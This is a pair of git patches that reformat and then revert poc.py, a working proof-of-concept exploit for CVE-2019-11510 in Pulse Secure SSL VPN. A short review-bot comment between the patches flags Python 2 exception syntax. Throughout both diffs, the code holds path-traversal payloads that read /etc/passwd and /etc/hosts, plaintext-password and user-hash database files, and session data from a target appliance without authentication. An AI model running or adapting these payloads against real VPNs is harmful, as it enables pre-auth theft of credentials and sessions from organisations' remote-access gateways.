From 34b0d40572db85acfec5b7345672875168eb3755 Mon Sep 17 00:00:00 2001 From: Keith Myers Date: Mon, 26 Aug 2019 10:49:01 -0400 Subject: [PATCH 1/2] Update poc.py Fixed formatting on line 79 --- poc.py | 134 ++++++++++++++++++++++++++++++++++----------------------- 1 file changed, 79 insertions(+), 55 deletions(-) diff --git a/poc.py b/poc.py index 0daace6..b88ed29 100644 --- a/poc.py +++ b/poc.py @@ -1,5 +1,6 @@ -#!/usr/bin/env python +#!/usr/bin/python # -*- coding: utf-8 -*- + # @Time : 2019/8/22 14:15 # @Author : 兀 # @File : CVE-2019-11510.py @@ -23,11 +24,11 @@ class TestPOC(POCBase): vulDate = '2019-08-10' createDate = '2019-08-14' updateDate = '2019-08-14' - references = [ - "https://hackerone.com/reports/591295", - "https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh", - "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html" - ] + references = ['https://hackerone.com/reports/591295', + 'https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh' + , + 'https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html' + ] name = 'Pulse Secure SSL VPN Pre-auth' appPowerLink = 'https://www.pulsesecure.net/' appName = 'Pulse Secure SSL VPN ' @@ -37,9 +38,8 @@ class TestPOC(POCBase): vulType = '' desc = ''' ''' - samples = [ - ] - install_requires = "" + samples = [] + install_requires = '' def _attack(self): return self._verify() 
@@ -51,74 +51,98 @@ def _verify(self): port = urlparse.urlparse(self.url).port scheme = urlparse.urlparse(self.url).scheme if port is None: - port = "80" + port = '80' else: port = str(port) - if "https" == scheme: - self.url = "%s://%s" % (scheme, host) + if 'https' == scheme: + self.url = '%s://%s' % (scheme, host) else: - self.url = "%s://%s:%s" % (scheme, host, port) - paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + self.url = '%s://%s:%s' % (scheme, host, port) + paylaod = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15)) - if "root:x:0:0:root" in res.text and res.status_code == 200: - result["VerifyInfo"] = {} - result["VerifyInfo"]["URL"] = self.url - result["VerifyInfo"]["passwd"] = res.text - result["VerifyInfo"]["host"] = self.get_hosts() - except Exception as e: + res = req.get(self.url + paylaod, verify=False, + headers=headers, timeout=(10, 15)) + if 'root:x:0:0:root' in res.text and res.status_code == 200: + result['VerifyInfo'] = {} + result['VerifyInfo']['URL'] = self.url + result['VerifyInfo']['passwd'] = res.text + result['VerifyInfo']['host'] = self.get_hosts() + except Exception, e: pass return self.parse_output(result) def get_hosts(self): - payload = 
"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + payload = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/' + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, + headers=headers, timeout=(10, 15)) return res.text - except Exception as e: + except Exception, e: return None def get_user_password(self): - payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \ - "/dana/html5acc/guacamole/" - payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" 
\ - "/dana/html5acc/guacamole/" + payload_palntext_passwd = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/' + payload_user_hash = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?/dana/html5acc/guacamole/' - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers, - timeout=(10, 15)).text - except Exception as e: + plantextpasswd = req.get(self.url + + payload_palntext_passwd, verify=False, + headers=headers, timeout=(10, 15)).text + except Exception, e: plantextpasswd = '' try: - userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text - except Exception as e: + userhash = req.get(self.url + payload_user_hash, + verify=False, headers=headers, + timeout=(10, 15)).text + except Exception, e: userhash = '' - return plantextpasswd, userhash + return (plantextpasswd, userhash) def get_session(self): - payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/" \ - "data.mdb?/dana/html5acc/guacamole/" - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + payload = \ + 
'/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/' + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, + headers=headers, timeout=(10, 15)) return res.text - except Exception as e: - return "" + except Exception, e: + return '' def parse_output(self, result): output = Output(self) From 2abbd862640130c3e46598e8dbc180ffae357d5f Mon Sep 17 00:00:00 2001 From: Keith Myers Date: Mon, 26 Aug 2019 10:52:33 -0400 Subject: [PATCH 2/2] Update poc.py Fixed more formatting errors --- poc.py | 134 +++++++++++++++++++++++---------------------------------- 1 file changed, 55 insertions(+), 79 deletions(-) diff --git a/poc.py b/poc.py index b88ed29..a9bee46 100644 --- a/poc.py +++ b/poc.py @@ -1,6 +1,5 @@ -#!/usr/bin/python +#!/usr/bin/env python # -*- coding: utf-8 -*- - # @Time : 2019/8/22 14:15 # @Author : 兀 # @File : CVE-2019-11510.py 
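Review bot: In PATCH 1/2's `@@ -51,74 +51,98 @@` hunk, the five handlers rewritten to `except Exception, e:` (in `_verify`, `get_hosts`, twice in `get_user_password`, and in `get_session`) use the Python 2-only form, so this is not a formatting-only change. The removed `except Exception as e:` parses under Python 2.6+ and 3, and the new form is a syntax error under Python 3; keep `except Exception as e:`. The shebang in the same patch's first hunk has a similar cost: `#!/usr/bin/env python` follows the active environment, while `#!/usr/bin/python` pins one system path. `_verify` begins above this hunk and `parse_output` continues below it.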
@@ -24,11 +23,11 @@ class TestPOC(POCBase): vulDate = '2019-08-10' createDate = '2019-08-14' updateDate = '2019-08-14' - references = ['https://hackerone.com/reports/591295', - 'https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh' - , - 'https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html' - ] + references = [ + "https://hackerone.com/reports/591295", + "https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh", + "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html" + ] name = 'Pulse Secure SSL VPN Pre-auth' appPowerLink = 'https://www.pulsesecure.net/' appName = 'Pulse Secure SSL VPN ' @@ -38,8 +37,9 @@ class TestPOC(POCBase): vulType = '' desc = ''' ''' - samples = [] - install_requires = '' + samples = [ + ] + install_requires = "" def _attack(self): return self._verify() 
@@ -51,98 +51,74 @@ def _verify(self): port = urlparse.urlparse(self.url).port scheme = urlparse.urlparse(self.url).scheme if port is None: - port = '80' + port = "80" else: port = str(port) - if 'https' == scheme: - self.url = '%s://%s' % (scheme, host) + if "https" == scheme: + self.url = "%s://%s" % (scheme, host) else: - self.url = '%s://%s:%s' % (scheme, host, port) - paylaod = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + self.url = "%s://%s:%s" % (scheme, host, port) + paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - res = req.get(self.url + paylaod, verify=False, - headers=headers, timeout=(10, 15)) - if 'root:x:0:0:root' in res.text and res.status_code == 200: - result['VerifyInfo'] = {} - result['VerifyInfo']['URL'] = self.url - result['VerifyInfo']['passwd'] = res.text - result['VerifyInfo']['host'] = self.get_hosts() - except Exception, e: + res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15)) + if "root:x:0:0:root" in res.text and res.status_code == 200: + result["VerifyInfo"] = {} + result["VerifyInfo"]["URL"] = self.url + result["VerifyInfo"]["passwd"] = res.text + result["VerifyInfo"]["host"] = self.get_hosts() + except Exception as e: pass return self.parse_output(result) def get_hosts(self): - payload = \ - 
'/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/' - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - res = req.get(self.url + payload, verify=False, - headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) return res.text - except Exception, e: + except Exception as e: return None def get_user_password(self): - payload_palntext_passwd = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/' - payload_user_hash = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?/dana/html5acc/guacamole/' + payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \ + "/dana/html5acc/guacamole/" + payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" 
\ + "/dana/html5acc/guacamole/" - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - plantextpasswd = req.get(self.url - + payload_palntext_passwd, verify=False, - headers=headers, timeout=(10, 15)).text - except Exception, e: + plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers, + timeout=(10, 15)).text + except Exception as e: plantextpasswd = '' try: - userhash = req.get(self.url + payload_user_hash, - verify=False, headers=headers, - timeout=(10, 15)).text - except Exception, e: + userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text + except Exception as e: userhash = '' - return (plantextpasswd, userhash) + return plantextpasswd, userhash def get_session(self): - payload = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/' - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/" \ + "data.mdb?/dana/html5acc/guacamole/" + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", 
"Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - res = req.get(self.url + payload, verify=False, - headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) return res.text - except Exception, e: - return '' + except Exception as e: + return "" def parse_output(self, result): output = Output(self)